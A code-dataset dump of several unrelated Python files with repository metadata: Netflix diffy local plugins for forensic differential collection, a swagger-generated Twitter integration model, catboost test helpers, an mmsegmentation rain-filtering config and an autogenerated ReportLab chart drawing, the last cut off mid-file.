"Apache-2.0"
] | 577 | 2018-05-02T02:04:11.000Z | 2022-03-16T00:57:42.000Z | diffy/plugins/diffy_local/plugin.py | TheGableMethod/diffy | f3f22cfdee4103619355c0987a4bfedf9f053a29 | [
"Apache-2.0"
] | 220 | 2018-07-19T20:33:39.000Z | 2021-03-26T15:02:16.000Z | diffy/plugins/diffy_local/plugin.py | TheGableMethod/diffy | f3f22cfdee4103619355c0987a4bfedf9f053a29 | [
"Apache-2.0"
] | 69 | 2018-05-01T23:10:15.000Z | 2021-11-18T19:09:00.000Z | """
.. module: diffy.plugins.diffy_simple.plugin
:platform: Unix
:copyright: (c) 2018 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Kevin Glisson <kglisson@netflix.com>
"""
import os
import subprocess
import shlex
import datetime
import json
import logging
from typing import List
from jsondiff import diff
from diffy.config import CONFIG
from diffy.exceptions import BadArguments
from diffy.plugins import diffy_local as local
from diffy.plugins.bases import AnalysisPlugin, PersistencePlugin, PayloadPlugin, CollectionPlugin, TargetPlugin
logger = logging.getLogger(__name__)
def get_local_file_path(file_type: str, key: str) -> str:
    """Build the full local path for a persisted JSON file."""
    prefix = f"{file_type}-" if file_type else ""
    return os.path.join(CONFIG.get("DIFFY_LOCAL_FILE_DIRECTORY"), f"{prefix}{key}.json")
class SimpleAnalysisPlugin(AnalysisPlugin):
    title = "simple"
    slug = "local-simple"
    description = "Perform simple differential analysis on collection results."
    version = local.__version__
    author = "Kevin Glisson"
    author_url = "https://github.com/Netflix-Skunkworks/diffy.git"

    def run(self, items: List[dict], **kwargs) -> List[dict]:
        """Attach a ``diff`` against the baseline stdout to every item."""
        logger.debug("Performing simple local baseline analysis.")
        baseline = kwargs.get("baseline")
        if not baseline:
            raise BadArguments("Cannot run simple analysis. No baseline found.")
        for item in items:
            item["diff"] = diff(baseline["stdout"], item["stdout"])
        return items
class ClusterAnalysisPlugin(AnalysisPlugin):
    title = "cluster"
    slug = "local-cluster"
    description = "Perform cluster analysis on collection results."
    version = local.__version__
    author = "Kevin Glisson"
    author_url = "https://github.com/Netflix-Skunkworks/diffy.git"

    def run(self, items: List[dict], **kwargs) -> List[dict]:
        """Run cluster calculation on results based on a baseline.

        NOTE: currently a placeholder -- ``items`` are returned unchanged.
        """
        logger.debug("Performing simple local cluster analysis.")
        return items
class FilePersistencePlugin(PersistencePlugin):
    """Persist collection/analysis results as JSON files on the local file system."""
    title = "file"
    slug = "local-file"
    description = "Store results locally for further analysis."
    version = local.__version__
    author = "Kevin Glisson"
    author_url = "https://github.com/Netflix-Skunkworks/diffy.git"

    def get(self, file_type: str, key: str, **kwargs) -> dict:
        """Fetch data from local file system.

        Returns the parsed JSON document, or None when no file exists for the
        given type/key combination.
        """
        path = get_local_file_path(file_type, key)
        # use the module logger (consistent with the rest of the module)
        # instead of the root logger
        logger.debug(f"Reading persistent data. Path: {path}")
        if os.path.exists(path):
            with open(path, "r") as f:
                return json.load(f)

    def get_all(self, file_type: str) -> List[dict]:
        """Fetch all stored JSON documents whose file name starts with `file_type`."""
        directory = CONFIG.get("DIFFY_LOCAL_FILE_DIRECTORY")
        items = []
        for file_name in os.listdir(directory):
            if file_name.startswith(file_type) and file_name.endswith(".json"):
                # BUGFIX: the previous implementation resolved listdir()
                # entries with os.path.abspath(), which joins against the
                # *current working directory* rather than the configured data
                # directory (and split file names on '/', which is not
                # portable). Join explicitly against the data directory.
                with open(os.path.join(directory, file_name), "r") as f:
                    items.append(json.load(f))
        return items

    def save(self, file_type: str, key: str, item: dict, **kwargs) -> None:
        """Save data to local file system."""
        path = get_local_file_path(file_type, key)
        logger.debug(f"Writing persistent data. Path: {path}")
        with open(path, "w") as f:
            json.dump(item, f)
class CommandPayloadPlugin(PayloadPlugin):
    """Payload plugin that forwards the locally configured commands unmodified."""
    title = "command"
    slug = "local-command"
    description = "Sends command without any modification."
    version = local.__version__
    author = "Kevin Glisson"
    author_url = "https://github.com/Netflix-Skunkworks/diffy.git"
    def generate(self, incident: str, **kwargs) -> dict:
        # `incident` is not used here; the payload is taken verbatim from config
        return CONFIG.get('DIFFY_PAYLOAD_LOCAL_COMMANDS')
class LocalShellCollectionPlugin(CollectionPlugin):
    """Execute payload commands on the local host and collect their JSON output."""
    title = 'command'
    slug = 'local-shell-collection'
    description = 'Executes payload commands via local shell.'
    version = local.__version__
    author = 'Alex Maestretti'
    author_url = 'https://github.com/Netflix-Skunkworks/diffy.git'

    def get(self, targets: List[str], commands: List[str], **kwargs) -> dict:
        """Run every command locally via subprocess and parse its stdout as JSON.

        :returns a mapping of command index to a single-element result list:
            {command_id: [{'instance_id': 'localhost',
                           'status': 'success',
                           'collected_at': <UTC timestamp string>,
                           'stdout': <parsed JSON output>}]}
        """
        # TODO: check if we are root, warn user if not we may not get a full baseline
        results = {}
        for command_index, command in enumerate(commands):
            logger.debug(f'Querying local system with: {command}')
            # split the shell-style command string into an argv list for subprocess
            argv = shlex.split(command)
            # TODO support python37
            completed = subprocess.run(argv, stdout=subprocess.PIPE)  # python36 only
            output = completed.stdout.decode('utf-8')
            # TODO: check return status and pass stderr if needed
            collected_at = datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S")
            results[command_index] = [{
                'instance_id': 'localhost',
                'status': 'success',
                'collected_at': collected_at,
                'stdout': json.loads(output)
            }]
            logger.debug(f'Results[{command_index}] : {format(json.dumps(output, indent=2))}')
        return results
class LocalTargetPlugin(TargetPlugin):
    """Target plugin that always selects the local system."""
    title = 'command'
    slug = 'local-target'
    description = 'Targets the local system for collection.'
    version = local.__version__
    author = 'Alex Maestretti'
    author_url = 'https://github.com/Netflix-Skunkworks/diffy.git'
    def get(self, key, **kwargs):
        # `key` is accepted for interface compatibility but not used
        return 'local' # returns arbitrary value that is ignored by local-collection
| 34.076503 | 112 | 0.63374 |
79547cb55b685aff822257a06ee558ae5217e4af | 16,684 | py | Python | build/PureCloudPlatformClientV2/models/twitter_integration.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | [
"MIT"
] | 10 | 2019-02-22T00:27:08.000Z | 2021-09-12T23:23:44.000Z | libs/PureCloudPlatformClientV2/models/twitter_integration.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | 5 | 2018-06-07T08:32:00.000Z | 2021-07-28T17:37:26.000Z | libs/PureCloudPlatformClientV2/models/twitter_integration.py | rocketbot-cl/genesysCloud | dd9d9b5ebb90a82bab98c0d88b9585c22c91f333 | [
"MIT"
] | 6 | 2020-04-09T17:43:07.000Z | 2022-02-17T08:48:05.000Z | # coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class TwitterIntegration(object):
    """
    Swagger model describing a Twitter messaging integration.

    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """

    def __init__(self):
        """
        TwitterIntegration - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
            and the value is attribute type.
        :param dict attributeMap: The key is attribute name
            and the value is json key in definition.
        """
        # maps each python attribute name to its swagger type name
        self.swagger_types = {
            'id': 'str',
            'name': 'str',
            'access_token_key': 'str',
            'consumer_key': 'str',
            'username': 'str',
            'user_id': 'str',
            'status': 'str',
            'tier': 'str',
            'env_name': 'str',
            'recipient': 'DomainEntityRef',
            'date_created': 'datetime',
            'date_modified': 'datetime',
            'created_by': 'DomainEntityRef',
            'modified_by': 'DomainEntityRef',
            'version': 'int',
            'create_status': 'str',
            'create_error': 'ErrorBody',
            'self_uri': 'str'
        }
        # maps python snake_case attribute names to the camelCase JSON keys
        self.attribute_map = {
            'id': 'id',
            'name': 'name',
            'access_token_key': 'accessTokenKey',
            'consumer_key': 'consumerKey',
            'username': 'username',
            'user_id': 'userId',
            'status': 'status',
            'tier': 'tier',
            'env_name': 'envName',
            'recipient': 'recipient',
            'date_created': 'dateCreated',
            'date_modified': 'dateModified',
            'created_by': 'createdBy',
            'modified_by': 'modifiedBy',
            'version': 'version',
            'create_status': 'createStatus',
            'create_error': 'createError',
            'self_uri': 'selfUri'
        }
        self._id = None
        self._name = None
        self._access_token_key = None
        self._consumer_key = None
        self._username = None
        self._user_id = None
        self._status = None
        self._tier = None
        self._env_name = None
        self._recipient = None
        self._date_created = None
        self._date_modified = None
        self._created_by = None
        self._modified_by = None
        self._version = None
        self._create_status = None
        self._create_error = None
        self._self_uri = None
    @property
    def id(self):
        """A unique Integration Id (str)."""
        return self._id
    @id.setter
    def id(self, id):
        """Set the unique Integration Id (str)."""
        self._id = id
    @property
    def name(self):
        """The name of the Twitter Integration (str)."""
        return self._name
    @name.setter
    def name(self, name):
        """Set the name of the Twitter Integration (str)."""
        self._name = name
    @property
    def access_token_key(self):
        """The Access Token Key from Twitter messenger (str)."""
        return self._access_token_key
    @access_token_key.setter
    def access_token_key(self, access_token_key):
        """Set the Access Token Key from Twitter messenger (str)."""
        self._access_token_key = access_token_key
    @property
    def consumer_key(self):
        """The Consumer Key from Twitter messenger (str)."""
        return self._consumer_key
    @consumer_key.setter
    def consumer_key(self, consumer_key):
        """Set the Consumer Key from Twitter messenger (str)."""
        self._consumer_key = consumer_key
    @property
    def username(self):
        """The Username from Twitter (str)."""
        return self._username
    @username.setter
    def username(self, username):
        """Set the Username from Twitter (str)."""
        self._username = username
    @property
    def user_id(self):
        """The UserId from Twitter (str)."""
        return self._user_id
    @user_id.setter
    def user_id(self, user_id):
        """Set the UserId from Twitter (str)."""
        self._user_id = user_id
    @property
    def status(self):
        """The status of the Twitter Integration (str)."""
        return self._status
    @status.setter
    def status(self, status):
        """Set the status of the Twitter Integration (str)."""
        self._status = status
    @property
    def tier(self):
        """The type of twitter account used for the integration (str)."""
        return self._tier
    @tier.setter
    def tier(self, tier):
        """Set the account tier; allowed values: 'premium', 'enterprise'."""
        allowed_values = ["premium", "enterprise"]
        if tier.lower() not in map(str.lower, allowed_values):
            # unknown enum value (e.g. sent by a newer API than this SDK
            # understands): fall back to a sentinel instead of raising
            self._tier = "outdated_sdk_version"
        else:
            self._tier = tier
    @property
    def env_name(self):
        """The Twitter environment name, e.g. 'env-beta' (required for premium tier)."""
        return self._env_name
    @env_name.setter
    def env_name(self, env_name):
        """Set the Twitter environment name (str)."""
        self._env_name = env_name
    @property
    def recipient(self):
        """The recipient associated to the Twitter Integration; used to
        associate a flow to an integration (DomainEntityRef)."""
        return self._recipient
    @recipient.setter
    def recipient(self, recipient):
        """Set the recipient associated to the Twitter Integration."""
        self._recipient = recipient
    @property
    def date_created(self):
        """Creation date as ISO-8601 datetime (yyyy-MM-ddTHH:mm:ss[.mmm]Z)."""
        return self._date_created
    @date_created.setter
    def date_created(self, date_created):
        """Set the creation date (datetime)."""
        self._date_created = date_created
    @property
    def date_modified(self):
        """Last-modification date as ISO-8601 datetime (yyyy-MM-ddTHH:mm:ss[.mmm]Z)."""
        return self._date_modified
    @date_modified.setter
    def date_modified(self, date_modified):
        """Set the last-modification date (datetime)."""
        self._date_modified = date_modified
    @property
    def created_by(self):
        """User reference that created this Integration (DomainEntityRef)."""
        return self._created_by
    @created_by.setter
    def created_by(self, created_by):
        """Set the user reference that created this Integration."""
        self._created_by = created_by
    @property
    def modified_by(self):
        """User reference that last modified this Integration (DomainEntityRef)."""
        return self._modified_by
    @modified_by.setter
    def modified_by(self, modified_by):
        """Set the user reference that last modified this Integration."""
        self._modified_by = modified_by
    @property
    def version(self):
        """Version number required for updates (int)."""
        return self._version
    @version.setter
    def version(self, version):
        """Set the version number required for updates (int)."""
        self._version = version
    @property
    def create_status(self):
        """Status of the asynchronous create operation (str)."""
        return self._create_status
    @create_status.setter
    def create_status(self, create_status):
        """Set the create status; allowed values: 'Initiated', 'Completed', 'Error'."""
        allowed_values = ["Initiated", "Completed", "Error"]
        if create_status.lower() not in map(str.lower, allowed_values):
            # unknown enum value from a newer API: fall back to a sentinel
            self._create_status = "outdated_sdk_version"
        else:
            self._create_status = create_status
    @property
    def create_error(self):
        """Error information returned if createStatus is 'Error' (ErrorBody)."""
        return self._create_error
    @create_error.setter
    def create_error(self, create_error):
        """Set the error information for a failed create (ErrorBody)."""
        self._create_error = create_error
    @property
    def self_uri(self):
        """The URI for this object (str)."""
        return self._self_uri
    @self_uri.setter
    def self_uri(self, self_uri):
        """Set the URI for this object (str)."""
        self._self_uri = self_uri
    def to_dict(self):
        """
        Returns the model properties as a dict, recursively converting
        nested models (anything exposing to_dict) and containers of models.
        """
        result = {}
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_json(self):
        """
        Returns the model as raw JSON
        """
        return json.dumps(sanitize_for_serialization(self.to_dict()))
    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())
    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()
    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
| 28.716007 | 131 | 0.593443 |
795480e9b38e5f2f570f738b1942a5c0f676e524 | 880 | py | Python | es_enas/util.py | DionysisChristopoulos/google-research | 7f59ef421beef32ca16c2a7215be74f7eba01a0f | [
"Apache-2.0"
] | 23,901 | 2018-10-04T19:48:53.000Z | 2022-03-31T21:27:42.000Z | es_enas/util.py | DionysisChristopoulos/google-research | 7f59ef421beef32ca16c2a7215be74f7eba01a0f | [
"Apache-2.0"
] | 891 | 2018-11-10T06:16:13.000Z | 2022-03-31T10:42:34.000Z | es_enas/util.py | admariner/google-research | 7cee4b22b925581d912e8d993625c180da2a5a4f | [
"Apache-2.0"
] | 6,047 | 2018-10-12T06:31:02.000Z | 2022-03-31T13:59:28.000Z | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains logging/saving utilities."""
import csv
import tensorflow as tf
def log_row(csv_file, row):
  """Append a single row to a tab-separated CSV log file.

  Args:
    csv_file: Path of the CSV file to append to (opened via tf.gfile, so
      remote filesystems supported by gfile work too).
    row: Iterable of values written as one tab-delimited line.
  """
  # Open in *text* append mode: Python 3's csv module requires a text-mode
  # file object; writing through a bytes-mode ('ab') handle raises TypeError.
  with tf.gfile.Open(csv_file, 'a') as csvfile:
    cw = csv.writer(
        csvfile, delimiter='\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)
    cw.writerow(row)
| 33.846154 | 74 | 0.738636 |
795481e95914a38bc2800e4065717858155f3bb4 | 5,856 | py | Python | catboost/pytest/lib/common_helpers.py | EkaterinaPogodina/catboost | 4628e86e978da2ec5e4d42f6b8d05e0b5e8aab30 | [
"Apache-2.0"
] | 2 | 2019-07-10T10:49:09.000Z | 2020-06-19T11:40:04.000Z | catboost/pytest/lib/common_helpers.py | EkaterinaPogodina/catboost | 4628e86e978da2ec5e4d42f6b8d05e0b5e8aab30 | [
"Apache-2.0"
] | null | null | null | catboost/pytest/lib/common_helpers.py | EkaterinaPogodina/catboost | 4628e86e978da2ec5e4d42f6b8d05e0b5e8aab30 | [
"Apache-2.0"
] | null | null | null | import csv
import json
import os
import random
import shutil
from copy import deepcopy
import numpy as np
__all__ = [
'DelayedTee',
'binary_path',
'compare_evals',
'compare_evals_with_precision',
'compare_metrics_with_diff',
'generate_random_labeled_set',
'permute_dataset_columns',
'remove_time_from_json',
'test_output_path',
]
# Use the yatest runner's path helpers when it is importable; otherwise fall
# back to environment-variable / cwd based implementations so these helpers
# also work outside of the yatest infrastructure.
try:
    import yatest
    binary_path = yatest.common.binary_path
    test_output_path = yatest.common.test_output_path
except ImportError:
    def binary_path(*path):
        # Locate built binaries below the BINARY_PATH environment variable.
        return os.path.join(os.environ["BINARY_PATH"], *path)
    def test_output_path(*path):
        # Without yatest, test outputs go to the current working directory.
        return os.path.join(os.getcwd(), *path)
def remove_time_from_json(filename):
    """Strip volatile timing fields from a JSON training log, in place.

    Removes the 'remaining_time' and 'passed_time' keys from every entry of
    the log's 'iterations' list so that logs from different runs compare
    deterministically, then rewrites the file with sorted keys.

    Args:
        filename: path of the JSON log file to rewrite.

    Returns:
        The same filename, for convenient chaining.
    """
    with open(filename) as f:
        log = json.load(f)
    # iterate entries directly -- the enumerate() index was never used
    for iter_info in log['iterations']:
        for key in ('remaining_time', 'passed_time'):
            # pop() with a default tolerates entries that lack the key
            iter_info.pop(key, None)
    with open(filename, 'w') as f:
        json.dump(log, f, sort_keys=True)
    return filename
# rewinds dst_stream to the start of the captured output so you can read it
class DelayedTee(object):
    """Context manager that redirects `src_stream` (at file-descriptor level)
    into `dst_stream` while the block runs, then restores `src_stream`,
    replays the captured output onto it, and leaves `dst_stream` positioned
    at the start of the captured data so callers can read it back.
    """
    def __init__(self, src_stream, dst_stream):
        # stream whose fd gets temporarily redirected (e.g. sys.stdout)
        self.src_stream = src_stream
        # writable+seekable stream (must have a real fd) receiving the output
        self.dst_stream = dst_stream
    def __enter__(self):
        self.src_stream.flush()
        # duplicate the original fd so it can be restored on exit
        self._old_src_stream = os.dup(self.src_stream.fileno())
        # remember where the capture starts inside dst_stream
        self._old_dst_stream_pos = self.dst_stream.tell()
        os.dup2(self.dst_stream.fileno(), self.src_stream.fileno())
    def __exit__(self, exc_type, exc_value, traceback):
        self.src_stream.flush()
        # restore the original fd, then replay the captured bytes onto it
        os.dup2(self._old_src_stream, self.src_stream.fileno())
        # BUGFIX: close the duplicated fd -- the original implementation
        # leaked one file descriptor per use of the context manager
        os.close(self._old_src_stream)
        self.dst_stream.seek(self._old_dst_stream_pos)
        shutil.copyfileobj(self.dst_stream, self.src_stream)
        # rewind so callers can read the captured output
        self.dst_stream.seek(self._old_dst_stream_pos)
def permute_dataset_columns(test_pool_path, cd_path, seed=123):
    """Shuffle the column order of a TSV dataset and remap its cd file.

    A seeded random permutation is applied to every row of the test pool;
    the column indices in the column-description (cd) file are rewritten to
    point at the permuted positions.  Returns the paths of the permuted
    pool file and the permuted cd file.
    """
    out_pool_path = test_output_path('permuted_test')
    out_cd_path = test_output_path('permuted_cd')
    rng = random.Random(seed)
    # derive the column count from the first data line
    with open(test_pool_path) as pool_file:
        num_columns = len(pool_file.readline().split('\t'))
    permutation = list(range(num_columns))
    rng.shuffle(permutation)
    with open(cd_path) as src_cd, open(out_cd_path, 'w') as dst_cd:
        for raw_line in src_cd:
            stripped = raw_line.strip()
            if not stripped:
                continue
            column_index, remainder = stripped.split('\t', 1)
            # new position of the original column inside the permutation
            dst_cd.write('{}\t{}\n'.format(permutation.index(int(column_index)), remainder))
    with open(test_pool_path) as src_pool, open(out_pool_path, 'w') as dst_pool:
        for raw_line in src_pool:
            cells = raw_line.strip().split('\t')
            dst_pool.write('\t'.join(cells[i] for i in permutation) + '\n')
    return out_pool_path, out_cd_path
def generate_random_labeled_set(nrows, nvals, labels, seed=20181219, prng=None):
    """Create an (nrows, 1 + nvals) array: a random label column drawn from
    `labels`, followed by uniform random feature columns.  A fresh seeded
    RandomState is used unless an explicit generator is supplied."""
    rng = np.random.RandomState(seed=seed) if prng is None else prng
    label_column = rng.choice(labels, [nrows, 1])
    feature_block = rng.random_sample([nrows, nvals])
    return np.concatenate([label_column, feature_block], axis=1)
# metrics that are reported per class (their header columns carry a class suffix)
BY_CLASS_METRICS = ['AUC', 'Precision', 'Recall', 'F1']


def compare_metrics_with_diff(custom_metric, fit_eval, calc_eval, eps=1e-7):
    """Check that metric columns of two tab-separated eval files agree.

    `custom_metric` may be a single metric name or a list of names.  Names
    listed in BY_CLASS_METRICS are expanded to every header column that
    shares the metric-name prefix.  Values are compared row by row with
    relative tolerance `eps`; the first violation raises Exception.
    """
    csv_fit = csv.reader(open(fit_eval, "r"), dialect='excel-tab')
    csv_calc = csv.reader(open(calc_eval, "r"), dialect='excel-tab')
    head_fit = next(csv_fit)
    head_calc = next(csv_calc)
    # BUGFIX: `basestring` only exists in Python 2; `str` keeps this working
    # on Python 3 (where the old code raised NameError)
    if isinstance(custom_metric, str):
        custom_metric = [custom_metric]
    for metric_name in deepcopy(custom_metric):
        if metric_name in BY_CLASS_METRICS:
            # replace the generic name with all matching per-class columns
            custom_metric.remove(metric_name)
            for fit_metric_name in head_fit:
                if fit_metric_name[:len(metric_name)] == metric_name:
                    custom_metric.append(fit_metric_name)
    col_idx_fit = {}
    col_idx_calc = {}
    for metric_name in custom_metric:
        col_idx_fit[metric_name] = head_fit.index(metric_name)
        col_idx_calc[metric_name] = head_calc.index(metric_name)
    while True:
        try:
            line_fit = next(csv_fit)
            line_calc = next(csv_calc)
            for metric_name in custom_metric:
                fit_value = float(line_fit[col_idx_fit[metric_name]])
                calc_value = float(line_calc[col_idx_calc[metric_name]])
                # relative error; guard against division by zero
                max_abs = max(abs(fit_value), abs(calc_value))
                err = abs(fit_value - calc_value) / max_abs if max_abs > 0 else 0
                if err > eps:
                    raise Exception('{}, iter {}: fit vs calc = {} vs {}, err = {} > eps = {}'.format(
                        metric_name, line_fit[0], fit_value, calc_value, err, eps))
        except StopIteration:
            break
def compare_evals(fit_eval, calc_eval):
    """Row-wise exact comparison of two tab-separated eval files.

    The fit file carries one extra trailing column, which is ignored.
    Returns True when every paired row matches; pairing stops at the end of
    the shorter file (extra rows in the longer file are not compared),
    mirroring the original paired iteration.
    """
    fit_rows = csv.reader(open(fit_eval, "r"), dialect='excel-tab')
    calc_rows = csv.reader(open(calc_eval, "r"), dialect='excel-tab')
    return all(fit_row[:-1] == calc_row for fit_row, calc_row in zip(fit_rows, calc_rows))
def compare_evals_with_precision(fit_eval, calc_eval, rtol=1e-6, skip_last_column_in_fit=True):
    """Numerically compare two tab-separated eval files.

    Headers must match exactly; data rows must agree within relative
    tolerance `rtol`.  When `skip_last_column_in_fit` is set, the trailing
    column of the fit file is dropped before comparison.
    """
    fit_values = np.loadtxt(fit_eval, delimiter='\t', skiprows=1, ndmin=2)
    calc_values = np.loadtxt(calc_eval, delimiter='\t', skiprows=1, ndmin=2)
    with open(fit_eval, "r") as header_file:
        fit_header = header_file.readline().split()
    with open(calc_eval, "r") as header_file:
        calc_header = header_file.readline().split()
    if skip_last_column_in_fit:
        fit_values = fit_values[:, :-1]
        fit_header = fit_header[:-1]
    if fit_header != calc_header:
        return False
    return np.all(np.isclose(fit_values, calc_values, rtol=rtol))
| 34.857143 | 102 | 0.654713 |
79548272bcc99ddebad7312b4d36d9cbdafa6509 | 2,146 | py | Python | configs/_base_/datasets/rain_filtering.py | kencan7749/mmsegmentation | e0fe1cb56e5b91f85e33a3ecc3afbeaa31f647e8 | [
"Apache-2.0"
] | null | null | null | configs/_base_/datasets/rain_filtering.py | kencan7749/mmsegmentation | e0fe1cb56e5b91f85e33a3ecc3afbeaa31f647e8 | [
"Apache-2.0"
] | null | null | null | configs/_base_/datasets/rain_filtering.py | kencan7749/mmsegmentation | e0fe1cb56e5b91f85e33a3ecc3afbeaa31f647e8 | [
"Apache-2.0"
] | null | null | null | # dataset settings
# mmsegmentation dataset configuration for LiDAR rain/particle filtering.
dataset_type = "ParticleDataset"
data_root ="data/rain_filtering_v2"#"/var/datasets/rain_filtering/"
#the order of mean or std should be ['first_depth', 'first_intensity', 'first_return_type',
# 'last_depth', 'last_intensity', 'last_return_type']
img_norm_cfg = dict(
    mean=[5038.093, 8.658958, 5.960323, 6241.105,
    9.026124, 5.805868], std=[2592.0776, 5.1905198, 1.5205307, 2186.4004,
    5.1824026, 1.6501048], to_rgb=False) # to_rgb is False since each channel is loaded as a gray image
crop_size = (32, 32) # crop 32x32 from 40x1800
img_scale = (40, 1800)
# training pipeline: random crops and flips, then per-channel normalization
train_pipeline = [
    dict(type='LoadMultiImageFromFile'),
    dict(type='LoadAnnotations'),
    dict(type='RandomCrop', crop_size=crop_size, cat_max_ratio=1.0),
    dict(type='RandomFlip', prob=0.5),
    dict(type='MultiNormalize', **img_norm_cfg), # normalize all six input channels
    dict(type='Pad', size=crop_size, pad_val=0, seg_pad_val=255),
    dict(type='DefaultFormatBundle'),
    dict(type='Collect', keys=['img', 'gt_semantic_seg']),
]
# test pipeline: full-size images, no augmentation (single scale, no flip)
test_pipeline = [
    # do LoadMultiIageFromFile but it is just to use mmseg apis. (img_ratio is just 1.0)
    dict(type='LoadMultiImageFromFile'),
    dict(
        type='MultiScaleFlipAug',
        img_scale=img_scale,
        img_ratios=[1.0],
        flip=False,
        transforms=[
            #dict(type='Resize', keep_ratio=True),
            dict(type='RandomFlip', prob=0.0),
            dict(type='MultiNormalize', **img_norm_cfg),
            dict(type='ImageToTensor', keys=['img']),
            dict(type='Collect', keys=['img']),
        ])
]
# dataloader settings and per-split dataset definitions
data = dict(
    samples_per_gpu=2,
    workers_per_gpu=2,
    train=dict(
        type=dataset_type,
        data_root=data_root,
        img_dir='range_images/train',
        ann_dir='ann_dir/train/',
        pipeline=train_pipeline),
    val=dict(
        type=dataset_type,
        data_root=data_root,
        img_dir='range_images/val',
        ann_dir='ann_dir/val',
        pipeline=test_pipeline),
    test=dict(
        type=dataset_type,
        data_root=data_root,
        img_dir='range_images/test',
        ann_dir='ann_dir/test',
        pipeline=test_pipeline))
| 35.180328 | 94 | 0.643057 |
7954840fe05abd133363975138b78d15840c83a5 | 5,333 | py | Python | tests/charts-out/test_graphics_charts_barcharts_sampleV5c4.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | 1 | 2020-05-21T23:34:55.000Z | 2020-05-21T23:34:55.000Z | tests/charts-out/test_graphics_charts_barcharts_sampleV5c4.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | null | null | null | tests/charts-out/test_graphics_charts_barcharts_sampleV5c4.py | debragail/reportlab-mirror | 1e5814e1313ed50d5abb65487b207711cb4f7595 | [
"BSD-3-Clause"
] | null | null | null | #Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.shapes import _DrawingEditorMixin, Drawing, Group, Rect, Line, String
from reportlab.lib.colors import Color, CMYKColor, PCMYKColor
class ExplodedDrawing_Drawing(_DrawingEditorMixin,Drawing):
    """Static "exploded" bar-chart drawing with hard-coded geometry.

    Autogenerated by the ReportLab guiedit tool (see file header) -- do not
    edit manually; regenerate through guiedit instead.
    """
    def __init__(self,width=400,height=200,*args,**kw):
        Drawing.__init__(self,width,height,*args,**kw)
        self.transform = (1,0,0,1,0,0)
        # outer plot frame
        self.add(Rect(50,50,300,125,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
        # bars: red/green/blue filled rectangles, all based at y=50
        self.add(Rect(60,50,40,20.83333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
        self.add(Rect(270,50,40,125,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
        self.add(Rect(110,50,40,41.66667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
        self.add(Rect(320,50,40,104.1667,rx=0,ry=0,fillColor=Color(0,.501961,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
        self.add(Rect(160,50,40,62.5,rx=0,ry=0,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
        self.add(Rect(370,50,40,83.33333,rx=0,ry=0,fillColor=Color(0,0,1,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
